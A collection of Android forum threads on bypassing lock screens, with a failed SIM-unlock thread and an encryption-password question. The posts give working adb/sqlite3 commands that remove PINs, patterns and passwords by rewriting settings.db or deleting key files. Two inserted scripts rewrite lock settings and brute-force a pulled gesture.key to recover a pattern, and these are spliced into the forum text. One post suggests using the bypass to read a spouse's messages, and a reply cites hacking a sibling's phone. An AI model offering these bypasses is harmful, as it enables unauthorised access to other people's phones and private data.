What does the ADK installer say? If it's complaining about not finding the JDK when you've already installed it, just hit Back, and then Next. It will detect it at that time and proceed with the installation. It's a known bug. Also, stick to JDK version 6 for the time being. Version 7 is so recent there might be some incompatibilities...
Thank you very much.
You're welcome.
Goodbye,
Darkshado
The phone is bricked now. What I did is: hold the Home key while pressing the power key; the phone asked me whether to "reboot the system now" or "update from /sdcard" or "wipe /data XXX factory reset" (something like factory reset) or "wipe /cache". I chose "reboot the system now". After that, I connected the phone to the PC. What I did on the PC is captured in the following image:
After that, when rebooting the phone, the phone began to flash "Samsung" and it cannot be shut down any more.
It seems that using other people's perso.txt does not work. One reason may be that, as you said, "perso.txt contains all the SIM-lock information, status and codes"; other than the unlock code, it might also read each individual phone's information, and since the perso.txt is not mine, the phone cannot find the proper information, which causes the phone to go into an indefinite loop. If that is the case, instead of uploading a new perso.txt, editing my own (even the corrupted) perso.txt and changing the corresponding location to the unlock code might work, as the phone could start up before. Another reason may be that by editing perso.txt, the system might detect the action, for example by using a CRC, and if only perso.txt is edited, the system detects the inconsistency and goes into an indefinite loop. If I were the developer and I were aware that people crack the phone, I might use another file or check code to protect it. In this case, "It turns out I can relock and unlock my phone as I see fit! I haven't tried, but I wouldn't be surprised if I could even lock my phone to a network other than Bell." might not work.
I guess that now even a hardware unlock will not work, because when the phone starts, it will read "perso.txt" and cannot find the right information. The only solution is to push my original corrupted perso.txt back to the phone, but the question is how? Can you advise me what I should do now? Since the phone does not start up at all, can I still flash the memory using Odin?
Thank you very much.
Cathy
Crap. I'm afraid that if your phone is now bootlooping with no access to recovery mode there is little to be done but to get it serviced or replaced.
No one has been able to flash EFS with Odin yet on our phones.
Also, your image attachment explaining what you attempted exactly is missing...
Look at the perso.txt files in a hex editor, there's no CRC or MD5 like thing anywhere in there. Of course it could be placed elsewhere, but it would be a first to have a booby-trapped phone OS...
I'll try locking my phone to another network within the next week for the heck of it.
Goodbye,
Darkshado
It's the format of the image. I changed to a different image format. You should be able to view the image in the first page now. Anyway, I posted it here again:
I'll try locking my phone to another network within the next week for the heck of it.
Let me know the result.
Thanks.
Cathy
SPnewb said:
Anyway, I posted it here again:
Please tell me: in what mode were you booted when you did the above?
Recovery?
Was the text blue or orange?
It's not normal that you had to use su. Otherwise your commands were correct starting with mount -o remount rw /
Darkshado said:
Please tell me: in what mode were you booted when you did the above?
Recovery?
Was the text blue or orange?
It's not normal that you had to use su. Otherwise your commands were correct starting with mount -o remount rw /
I thought that I booted in recovery mode, since when I turned on the phone I held the Home key and then pressed the power key, but when the phone started up there were only 4 or 5 choices in the recovery menu, and except for "reboot the system now" there were no other choices about rebooting. I suspected that choosing "reboot the system now" would cause a startup in normal mode. How do you start up the phone in recovery mode?
I cannot recall the color of the text, but I have never seen any orange text since I had the phone.
Thank you very much for your help. I'm going to get another Gio to unlock.

[Hack] remove a lockscreen pin via adb with sqlite3

There are a couple of other ways posted for folks who have forgotten a lockscreen password or pattern, but this method REMOVES the PIN; for pattern and password, follow the other methods.
This method requires root access and debugging enabled.
*if debugging is not enabled it can be done from any custom recovery
-reboot recovery and follow code
PIN
Code:
adb shell
# sqlite3 /data/data/com.android.providers.settings/databases/settings.db
sqlite> update secure set value=65536 where name='lockscreen.password_type';
sqlite> .exit
# exit
adb reboot
step 1
Code:
adb shell
make sure you have # in the command prompt/terminal (if not type su)
step 2
Code:
sqlite3 /data/data/com.android.providers.settings/databases/settings.db
you will now see sqlite>in command prompt/terminal
step 3
Code:
update secure set value=65536 where name='lockscreen.password_type';
still sqlite>
step 4
Code:
.exit
you will see the # again
step 5
Code:
exit
you will now be in the path/to/adb command prompt/terminal again
step 6
Code:
adb reboot
Enjoy full access to the device
Now let's say you think your wife is cheating on you (which she probably is) and you want to check her sext messages but put the PIN back when you are done.
Code:
adb shell
# sqlite3 /data/data/com.android.providers.settings/databases/settings.db
sqlite> update secure set value=131072 where name='lockscreen.password_type';
sqlite> .exit
# exit
adb reboot
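The two values the post writes into lockscreen.password_type are DevicePolicyManager PASSWORD_QUALITY constants: 65536 (0x10000) is PASSWORD_QUALITY_SOMETHING, the quality a pattern lock uses, and 131072 (0x20000) is PASSWORD_QUALITY_NUMERIC, a PIN. The PIN hash itself lives elsewhere (/data/system/password.key), which is why flipping the value back restores the original PIN. The script below is an added example, not code from the post: it works on a copy of settings.db pulled off the device, writes a .bak before touching anything, reports the lock-related rows with their meaning, and looks in both the `system` and `secure` tables, because older releases keep these rows in `system` while the post's device has them in `secure`. The sample database it builds when run without arguments is constructed for the demo; the rows and schema match what the settings provider uses.

```python
"""Inspect and rewrite the lock-screen rows of a settings.db copied off a device.

Added example for this thread, not code from the post. Work on a copy
(adb pull /data/data/com.android.providers.settings/databases/settings.db)
and push it back afterwards; a .bak copy is written before any change.
"""
import shutil
import sqlite3
from contextlib import closing

# lockscreen.password_type stores a DevicePolicyManager.PASSWORD_QUALITY_*
# value. 65536 (SOMETHING) is what a pattern lock uses, 131072 (NUMERIC)
# a PIN; the post flips between exactly these two.
PASSWORD_QUALITY = {
    0x00000: "UNSPECIFIED",
    0x10000: "SOMETHING",      # 65536: pattern
    0x20000: "NUMERIC",        # 131072: PIN
    0x40000: "ALPHABETIC",     # 262144
    0x50000: "ALPHANUMERIC",   # 327680
    0x60000: "COMPLEX",        # 393216
}

# Lock-screen rows of interest. Older releases keep them in `system`,
# newer ones in `secure`, so both tables are searched.
LOCK_KEYS = (
    "lockscreen.password_type",
    "lock_pattern_autolock",
    "lockscreen.lockedoutpermanently",
    "lockscreen.password_salt",
)
TABLES = ("system", "secure")


def quality_name(value):
    """Translate a lockscreen.password_type value into its constant name."""
    try:
        return PASSWORD_QUALITY.get(int(value), "UNKNOWN(%d)" % int(value))
    except (TypeError, ValueError):
        return "UNKNOWN(%r)" % (value,)


def _present_tables(conn):
    """Only the settings tables that actually exist in this database file."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type='table'")
    existing = {r[0] for r in rows}
    return [t for t in TABLES if t in existing]


def lock_state(db_path):
    """Return {(table, name): value} for every lock-related row that exists."""
    state = {}
    with closing(sqlite3.connect(str(db_path))) as conn:
        for table in _present_tables(conn):
            placeholders = ",".join("?" * len(LOCK_KEYS))
            query = "SELECT name, value FROM %s WHERE name IN (%s)" % (table, placeholders)
            for name, value in conn.execute(query, LOCK_KEYS):
                state[(table, name)] = value
    return state


def set_password_type(db_path, quality):
    """Back up the file, then rewrite lockscreen.password_type where it lives.

    Returns the table that was changed, or None when no row matched (the
    post's UPDATE would then have silently changed nothing).
    """
    shutil.copy2(str(db_path), str(db_path) + ".bak")
    with closing(sqlite3.connect(str(db_path))) as conn:
        for table in _present_tables(conn):
            cur = conn.execute(
                "UPDATE %s SET value=? WHERE name='lockscreen.password_type'" % table,
                (str(int(quality)),))
            if cur.rowcount:
                conn.commit()
                return table
    return None


def make_sample_db(db_path):
    """Build a minimal settings.db (constructed for the demo) with a PIN set."""
    with closing(sqlite3.connect(str(db_path))) as conn:
        for table in TABLES:
            conn.execute("CREATE TABLE %s (_id INTEGER PRIMARY KEY AUTOINCREMENT,"
                         " name TEXT UNIQUE ON CONFLICT REPLACE, value TEXT)" % table)
        conn.executemany("INSERT INTO secure (name, value) VALUES (?, ?)",
                         [("lockscreen.password_type", "131072"),
                          ("lock_pattern_autolock", "0")])
        conn.commit()


if __name__ == "__main__":
    import os, sys, tempfile
    if len(sys.argv) > 1:
        db = sys.argv[1]                       # a settings.db pulled from the phone
    else:
        db = os.path.join(tempfile.mkdtemp(), "settings.db")
        make_sample_db(db)
    for (table, name), value in sorted(lock_state(db).items()):
        print("before: %s.%s = %s %s" % (table, name, value,
              "(%s)" % quality_name(value) if name == "lockscreen.password_type" else ""))
    print("updated table:", set_password_type(db, 0x10000))   # the post's "remove PIN" value
    for (table, name), value in sorted(lock_state(db).items()):
        print("after:  %s.%s = %s" % (table, name, value))
```

Run it against the pulled file, push the result back and reboot as in the post; to undo, run set_password_type with 131072 or simply push the .bak copy back. A return value of None from set_password_type means the row was not found in either table, so the post's UPDATE would have done nothing on that device.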
I find this a bit scary, how would you normally prevent ADB or Recovery hacking like this if your device gets stolen?
BrotherG said:
I find this a bit scary, how would you normally prevent ADB or Recovery hacking like this if your device gets stolen?
I recommend Avast Anti Theft.
When your device gets stolen, the new owner will take the sim card out and put his in huh?
Well, anti theft sends a pre-entered number a warning that an other SIM is in it. Via sms commands, you can turn GPS on, send the location, block root and stuff.
It wont be deleted as it is a system app
I use it.
Thanks for the job, needed this for hacking my bros phone xD
Greets!
hahaha. .... these Feds could have used this method. They couldn't get past the lockscreen. Great read here.
How a Pimp’s Android Pattern Lock Foiled the Feds
http://gizmodo.com/5893410/how-a-pimps-android-pattern-lock-foiled-the-feds
Looks like CyanogenMod is working on securing ADB
Security and You
March 16th, 2012
jeagoss
Many of you may not give it a second glance, but among all the furor and concern about permissions requested by market apps and privacy, all Custom ROMs (CyanogenMod included) ship with one major security risk — root!
We have been struggling with how to handle this for quite a bit, and took a first step with the first public CyanogenMod 9 alpha builds, by disabling the previously-default root access over USB. You can still get adb root access by running “adb root” in terminal, should you ever need it.
We recently merged 3 patches into CyanogenMod 9, to further address this: http://goo.gl/eCjDV http://goo.gl/oWAFI and http://goo.gl/34vai.
What follows is an explanation of the changes, how they affect you and our reasoning behind them.
What do the patches do?
They disable root selectively and in a configurable way. Users will be able to configure their exposure to root as:
Disabled
Enabled for ADB only
Enabled for Apps only
Enabled for both
How does this change affect the usage of your device, and root apps you have installed?
On a default CyanogenMod installation, root usage will have to be explicitly enabled by the user. This means that the user is fully aware that any application that uses root may perform actions that could compromise security, stability and data integrity. Once enabled, the process mirrors that of the current process, apps that request root will be flagged by the SuperUser.apk and the user will have to grant selective access.
Why the change?
At CyanogenMod, security has always been one of our primary concerns, however, we were hesitant to make a change that might disrupt the current root ecosystem. With CyanogenMod 9 we have the opportunity to do things better, whether its the code in the OS, UI/UX, or security – we are taking this time to do things with a fresh approach.
Shipping root enabled by default to 1,000,000+ devices was a gaping hole. With these changes we believe we have reached a compromise that allows enthusiasts to keep using root if they so desire but also provide a good level of security to the majority of users.
What concerns remain?
Many of you reading this are savvy enough to note a remaining hole in this approach – recovery and unlocked bootloaders. The bootloaders are out of our hands, there is little to nothing we can do on that front.
Regarding recovery – with unlocked bootloaders, a malicious user could just flash a new recovery image (without any potential security we could apply) or just dump the data partition. This however, requires physical access to the device. As such, the security standards for this are highly reliant on you, the device owner. Data encryption is available in ICS to safeguard your data. (Warning for emmc only users – encrypted /data means recovery will be non-functional.)
The onus is on you to secure your device; take care of your possessions, and this risk is minimal. Always make sure you take devices out of your car before you go into the mall and remove them from pockets before washing laundry. Common sense is a basic security tool.
But Why?
We honestl
Source: http://www.cyanogenmod.com/blog/security-and-you
mDroidd said:
I recommend Avast Anti Theft.
When your device gets stolen, the new owner will take the sim card out and put his in huh?
Well, anti theft sends a pre-entered number a warning that an other SIM is in it. Via sms commands, you can turn GPS on, send the location, block root and stuff.
It wont be deleted as it is a system app
I use it.
Thanks for the job, needed this for hacking my bros phone xD
Greets!
All true, if speaking of a casual thief- maybe you left the phone on the bar and someone couldn't resist the temptation. A couple of months ago my wife's phone was recovered in such an occasion- got an sms from Avast Theft Aware with the new number, contacted the rather surprised "honest finder" and he decided to return it back to us.
Anyway, two weeks ago I went scuba diving and when returning to the car found the window broken and sure enough, among other stuff (wallets, scuba gear etc.) both our phones were stolen. However, this time it looks like the thieves were not quick to put in their own SIM card. Actually, it looks like they've removed the batteries and thrown the SIM cards away (they're useless anyway as the carrier blocks the SIM).
Since then, no signs whatsoever that the phones have been turned on, sims replaced or that someone has tried to type wrong security pin or whatever- no sms notifications, no emails, no webtracking, nothing.
My guess- the thieves sell them for a small fee (20% of street price?) to some lab or someone who knows "how to deal with it"- do a good wipe (not just factory reset) and remove whatever stuff was installed- system app or not- then put them on market for sale as second hand. Or maybe they just wait with patience a few weeks until you stop looking for it?
So, sometimes these apps like Avast, Cerberus and the like work, sometimes not. Better to keep the phone safe and not rely on it being stolen by a stupid thief...
On the bright side, one can consider it as an opportunity for upgrade
First I typed in:
sqlite3 /data/data/com.android.providers.settings/databases/settings.db
However, in spite of what he stated, the sqlite> prompt doesn't appear in the command prompt.
Instead, I get
/system/bin/sh: sqlite3: not found
how do i set sqlite working?
I'm unable to launch sqlite3 from adb shell
I can manually launch sqlite from the folder but not in cmd
You have to install sqlite3 - https://play.google.com/store/apps/details?id=ptSoft.util.sqlite3forroot&hl=en
Is there a tutorial for a password locked screen too?
Is there another way to bypass the PIN code lockscreen? Because I'm always getting stuck on:
" /sbin/sh: sqlite3: not found "
I have installed sqlite from market
any idea?
whoa, you guys are amazing, this worked like a charm on a password locked tablet
polaroid pmid70c
This is a scary concept. If you value your Android device, consider installing a paid service like DynDNS, install the paid version of RealVNC onto the device and have SSH set up as well. This would help to recover your phone in the event it becomes stolen: you could SSH into it, launch apps, view and control the phone remotely via VNC, even take pictures, turn on GPS, all sorts of cool things.
holm94 said:
Is there another way to bypass the pin code lockscreen? Cus´ I´m always stucking on: " /sbin/sh: sqlite3: not found " I have installed sqlite from market
your phone is root enabled? Superuser or SuperSU app installed? Connect USB and run "adb root" and that works?
Try this installer app again https://play.google.com/store/apps/details?id=ptSoft.util.sqlite3forroot&hl=en
I flashed the root feature with SuperSU update zip file in recovery mode, and rebooted.
I grabbed a 'sqlite3' binary made for ARM cpu from the 'net and manually pushed it to my phone's /system/xbin/ directory.
1. unzip this sqlite3 file
2. power on device in custom recovery mode, ('factory mode' also may work, such as in some chinese phones, including my Jiayu)
3. connect USB cable, and in recovery mode, mount the /system directory and any other directories you will use (see screenshot)
4. open a command prompt (terminal) on computer and run these commands
Code:
adb root
adb remount
adb push sqlite3 /system/xbin/sqlite3
adb shell
chmod 755 /system/xbin/sqlite3
sqlite3 -h
...
exit
adb reboot
* alternate method: if #4 'adb root' does not work, then turn on phone to normal running mode and do:
Code:
adb push sqlite3 /data/local/tmp/sqlite3
adb shell
su
mount -o rw,remount /system
cp /data/local/tmp/sqlite3 /system/xbin/
rm /data/local/tmp/sqlite3
chmod 755 /system/xbin/sqlite3
sqlite3 -h
...
exit
exit
adb reboot
"exit" twice for alternate method.
All this can be done over Wifi instead of USB via a SSH server app.
^_^
I can run all the commands fine, but the PIN lock is still there on my phone after reboot. Android 4.2.1, Jiayu Chinese ROM. So method does not work.
help me, im stuck at " error: device unauthorized. Please check the confirmation dialog on your device."
I know this is super old thread but I used this method and combination with other commands I found on internet to bypass my lockscreen on att samsung galaxy s7 phone I had forgotten pin code on.
I was using fingerprint for a couple of months and rebooted the phone for an update, and it requires the PIN code the first time before using fingerprint again, and I had flat out forgotten it. When it got to a 1 hour wait between input retries, I searched and found this and other methods. I read no methods work unless rooted.
Luckily and thank God I'm rooted and usb debugging turned on and I have adb installed configured and have used with phone before....thank God. Because pretty much every and anything else on the phone is turned off on phone so I keep off the grid.
I know I'm dragging this out but I want to document and reiterate the value of xda. I will try and remember exactly what I did and may just redo it to be sure and list my exact steps.
One thing, I don't have the sqlite3 cursor when connecting with adb....I have hero2qltatt or something like that .....I'll get it corrected with an edit when I go through it again to make sure.
Also, once I got past lockscreen, when I went into setting/lockscreen&security/ on the phone it still showed pin,fingerprint as security but somehow which still baffles me there was a pick for 'swipe' available....but I still don't know how that happened or how it appeared but I kept trying different pin codes to try to reset that which now there were no limits or time delays but still couldn't remember and then I saw a pick for 'swipe' and that solved it all. I rebooted again to be sure and perfect. Then I went in to recovery and wiped cache and now my phone is back exactly as before.
I wrote down the pin code this time.
Eventually soon I will rerun my steps and document exactly and maybe there is already a more recent account but I found this one first and it pretty much worked....thanks.
OK this is what I used:
adb shell
cd data/system
su
rm *.key

reboot

[GUIDE][HOW-TO]Crack android pattern lock!

Disclaimer: this is for educational purposes only. You shall not use this on other people's phones without permission under any circumstances, and I am not responsible for any misuse of this hack.
OK, so not long ago I had a problem with a locked Android device with a pattern, and I managed to unlock it using adb, so here's how, in case you are stuck one day with a locked device.
The device needs to have USB debugging enabled. In case USB debugging isn't enabled and you have CWM, you can run the same instructions from CWM. Root is not required (though it will be much better if the device is rooted).
This was tested on: Gingerbread, Ice Cream Sandwich and Jelly Bean.
Both methods are through adb.
method 1:
Code:
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit
-AND/OR-
method 2:
Code:
adb shell rm /data/system/gesture.key
and that's a video showing how method 2 is done (thanks to melvinchng) : http://www.youtube.com/watch?v=tVJ7T2oC_Zs&feature=player_embedded
You can try both of them. Here is how I managed to remove the lock:
1- run the first method.
2-reboot
3-run the second method
4-reboot
NOTES:
-in the first method each line is a separate command, so press Enter after typing each line.
-in the second method type the whole command and then press Enter.
-after running both methods and rebooting you may still see the pattern lock; that doesn't necessarily mean it didn't work. Just try any random pattern and it may unlock; then remove the pattern from Settings.
-this may or may not work; it may work on some devices and not on others, so all you can do is try it, but I can't assure you it will work.
A small donation would be much appreciated, thanks (check my signature).
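Method 2 deletes gesture.key and throws the pattern away. On the releases the guide was tested on (Gingerbread through Jelly Bean) that file is the raw, unsalted SHA-1 of the pattern's dot sequence, one byte per dot numbered row*3+col, which is why it is exactly 20 bytes (a later reply in this thread shows that size). The pattern can therefore be recovered offline from a pulled copy instead, leaving the device untouched. The script below is an added example, not part of the guide: it enumerates every drawable pattern of 4 to 9 dots, honouring Android's rule that a stroke may only pass over a dot that has already been used (389,112 patterns under these rules), and compares hashes. The sample hash it uses when run without a file argument is constructed from a known pattern for the demo. Newer releases salt the pattern hash and keep it in a different file, so this applies only where gesture.key exists.

```python
"""Recover an Android pattern from a pulled /data/system/gesture.key by brute force.

Added example, not part of the guide. Applies to releases where gesture.key is
the 20-byte unsalted SHA-1 of the dot sequence (Gingerbread through Jelly Bean).
"""
import hashlib

MIN_LEN, MAX_LEN = 4, 9   # Android accepts patterns of 4 to 9 dots


def gesture_hash(pattern):
    """SHA-1 over one byte per dot (row*3+col), as LockPatternUtils.patternToHash did."""
    return hashlib.sha1(bytes(pattern)).digest()


def _midpoint(a, b):
    """Dot lying on the straight line between a and b, or None if there is none.
    Android only lets a stroke jump over such a dot when it was already used."""
    ra, ca = divmod(a, 3)
    rb, cb = divmod(b, 3)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None
    return ((ra + rb) // 2) * 3 + (ca + cb) // 2


def valid_patterns():
    """Yield every drawable pattern as a tuple of dot indexes (no repeats, skip rule honoured)."""
    def extend(path, used):
        if len(path) >= MIN_LEN:
            yield tuple(path)
        if len(path) == MAX_LEN:
            return
        for nxt in range(9):
            if used & (1 << nxt):
                continue                       # each dot at most once
            mid = _midpoint(path[-1], nxt)
            if mid is not None and not used & (1 << mid):
                continue                       # would pass over an unused dot
            path.append(nxt)
            yield from extend(path, used | (1 << nxt))
            path.pop()

    for start in range(9):
        yield from extend([start], 1 << start)


def crack(key_bytes):
    """Return the pattern whose hash equals the 20 bytes read from gesture.key, else None."""
    if len(key_bytes) != 20:
        raise ValueError("gesture.key should be exactly 20 bytes (an unsalted SHA-1)")
    for pat in valid_patterns():
        if gesture_hash(pat) == key_bytes:
            return pat
    return None


def render(pattern):
    """3x3 grid showing the stroke order (1 = first dot), '.' for unused dots."""
    order = {dot: str(i + 1) for i, dot in enumerate(pattern)}
    return "\n".join(" ".join(order.get(r * 3 + c, ".") for c in range(3))
                     for r in range(3))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:      # e.g. adb pull /data/system/gesture.key
            key = f.read()
    else:
        key = gesture_hash((1, 0, 2, 5))        # constructed demo hash: top row then down
    found = crack(key)
    print("no drawable pattern matches" if found is None else render(found))
```

Pull the file with adb (or copy it from a recovery mount of /data), run the script on it, and draw the printed order on the lock screen; no files on the device are modified. A hash that matches no drawable pattern means the file is not an unsalted gesture hash, which is what to expect on a newer release.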
But What if i remember the password well enough, but didnt have data enabled the moment it got locked?
Explained elaborately here>>>http://forum.xda-developers.com/showthread.php?p=29963687
It will unlock either way (look at the time of the message above - I am a time traveler)
I have a better method than both of the above ones
look for smudges on the phone
Do the files need to be restored or are they just the user data for the pattern locks?
This is really great...
i wonder how do you discover this
you must be a hacker
Or you could boot into recovery backup data
wipe factory reset and reboot
Could try restoring data but most likely restore pattern lock
Or simply enter your gmail address as requested
2nd option...
if you have Custom recovery
use AROMA File Explorer and you can do the same thing through the recovery
or adb through the recovery
FWIW, on CM10 neither method works as non-root. Yay CyanogenMod.
Method #1 FAIL:
1|[email protected]:/data/data/com.android.providers.settings/databases $ ll
opendir failed, Permission denied
255|[email protected]:/data/data/com.android.providers.settings/databases $ sqlite3 settings.db
Error: unable to open database "settings.db": unable to open database file
Method #2 FAIL:
[email protected]:/data $ ll /data/system/gesture.key
-rw------- system system 20 2012-08-11 04:51 gesture.key
[email protected]:/data $ rm /data/system/gesture.key
rm failed for /data/system/gesture.key, Permission denied
(I use faceunlock + pattern (mostly to keep my kid outta my phone), but if I actually cared more about security I'd encrypt my phone and use a passphrase instead)
This is a useful guide, thanks, I will try it :good:
So I guess if Debugging wasn't previously enabled, you have no chance to unlock it...
I've noticed a locked Archos tablet in a shop (probably some stupid shopper locked it) and when I saw this thread announced on the first page I was thinking of helping the shop owner. But I guess I cannot.
Have a nice day!
I don't know whether this method can be used on any of the following: rooted, Busybox installed, ROM version older or newer than CM7.
This method requires ADB debugging on, a PC, and the tool provided.
I found this trick a long time ago.
I'm here to share it.
Download the By-pass security Hack.7z
http://www.mediafire.com/download.php?li2686c3jenmen6
Primary steps for all methods:
Extract it to anywhere using 7-zip.
Open SQLite Database Browser 2.0.exe in the SQLite Database Browser folder.
Run pull settings.db.cmd inside the By-pass security Hacks folder to pull the settings file out of your phone.
Drag settings.db and drop it onto the SQLite Database Browser 2.0.exe program.
Navigate to the Browse Data tab; at Table, click to list the selection and select secure.
Instruction To Remove Pattern Lock:
Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove PIN Lock:
Now, find or create lockscreen.password_type, double-click and change its value to 65536, then Apply changes.
Now, find lock_pattern_autolock and Delete Record; if it doesn't exist, ignore this step.
Close & save database
Run push settings.db.cmd and reboot your phone
Instruction To Remove Password Lock:
Now, find lockscreen.password_salt, Delete Record
Now, find lockscreen.password_type, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone
hmmm, I hope those thieves don't find this thread lol
zmore said:
FWIW, on CM10 neither method works as non-root. Yay CyanogenMod.
Nor does either method work on unrooted Galaxy Nexus with stock Jelly Bean. Yay stock Android.
mixtapes08 said:
hmmm, I hope those thieves don't find this thread lol
don't leave usb debugging checked on then.
I advise you guys to also post your Android version. My opinion is that the security hole that permits this hack has been removed in JellyBean, maybe even in an earlier version.
I will try it too a little later, just for the fun's sake.
aussiebum said:
don't leave usb debugging checked on then.
If you have forgotten to leave USB debugging enabled, reboot your phone into recovery and do the same. No USB debugging required.
You may however need to mount the partition being accessed by this method, and you can do that only if you have a custom recovery installed (which you more-than-likely have, since you're here on XDA). Just go to 'Mounts and Storage' and mount /data. Then use the method just the normal way. Cheers!
Useful guide for sure. Will keep this as reference!
Does this only work for the pattern unlock or will it also work on the password or the PIN unlock screen?
I can confirm that it is working on a CM7.2 Motorola Defy.
Thanks m.sabra!

Messed up with 'vdc cryptfs changepw password' and entered hex values I can't type.

TL;DR I need an answer to one of the four questions at the bottom.
Preferably #1 or #3.
---------------------------------------------------------------
I have a Oneplus 3T running the latest Resurrectionremix (7.1.1) and TWRP recovery (3.0.4-1).
I use a pattern lock and device encryption, but I had separate passwords for the pattern and the encryption.
I tried to change my encryption password back to my pattern combo using 'vdc cryptfs changepw password' and entering numbers that correspond to the dots of the pattern. (E.g. in a 3x3, the dots are labeled 1-9)
Let's say the password I entered was '123456789'
I didn't realize that I needed to enter the HEX values in this command, (313233343536373839) so I just entered the ASCII values (123456789). The password I entered was all numbers so it corresponded to HEX values without giving an error.
Now, when I restart my phone, or boot into TWRP, I cannot enter the password I set. I cannot access adb or a terminal when booting android, and I cannot use 'vdc cryptfs' through TWRP. (I can use adb and terminal through TWRP)
The obvious solution is to convert the HEX values I entered to ASCII values and type them in, but I have two problems:
I use an odd number of dots for my pattern lock, and I entered an odd number of numbers for the HEX password. I don't know how that would break down into ASCII, because you need 2 HEX digits per ASCII character.
No matter how I convert the HEX to ASCII (either by prepending or appending a 0) there are characters that cannot be typed on a keyboard, and cannot be pasted into an adb shell.
---------------------------------------------------------------
I can think of a number of possible solutions to this problem:
How can I input my encryption password in hexadecimal rather than ASCII?
I think this would only be possible through TWRP/adb. It only needs to be temporary; I'll move my data out and format everything.
How can I backup the encrypted '/data' partition to my PC?
This way, I can freely format my phone while I try to decrypt the encrypted blob. Additionally, are there tools to help me decrypt the partition on a PC?
How can I use 'vdc cryptfs' in TWRP?
Right now, the problem is that it cannot find 'cryptd'. If I can get this to work, I can reset the password to something typeable.
How can I use 'vdc cryptfs' in Android without entering a password on boot?
As I said, my phone doesn't turn on adb before I enter the password, and I can't access Terminal or anything... or is there a way?
Or can I solve this any other way, without losing my data?
Alternatively, is there a way to inject hex into android's clipboard, and paste it during boot or in TWRP?
